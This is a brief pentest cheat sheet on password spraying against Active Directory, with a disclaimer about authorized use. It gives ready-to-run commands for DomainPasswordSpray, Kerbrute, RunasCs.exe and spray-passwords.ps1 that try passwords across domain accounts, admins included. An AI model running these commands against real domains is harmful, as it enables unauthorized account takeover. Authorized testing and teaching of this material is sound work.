Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Using DomainPasswordSpray.ps1
-
Import the DomainPasswordSpray module:
Import-Module .\DomainPasswordSpray.ps1
-
Run Invoke-DomainPasswordSpray
with the desired password and output file parameters:
Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile spray_success -ErrorAction SilentlyContinue
Using Kerbrute for Password Spraying
- Execute the password spray attack:
kerbrute passwordspray -d example.local --dc [IP_ADDRESS] valid_users.txt [PASSWORD]
Using RunasCs.exe
-
Validate credentials locally without requiring SMB, LDAP, WinRM, Kerberos, or other authenticated services:
.\RunasCs.exe Administrator notthepassword "cmd /c whoami"
-
Use the spray-passwords.ps1
script: Spray-Passwords.ps1
Example usage to test passwords against all users in AD, including admins:
.\spray-passwords.ps1 -Admin -Pass IamUser01
.\spray-passwords.ps1 -Admin -Pass IamUser02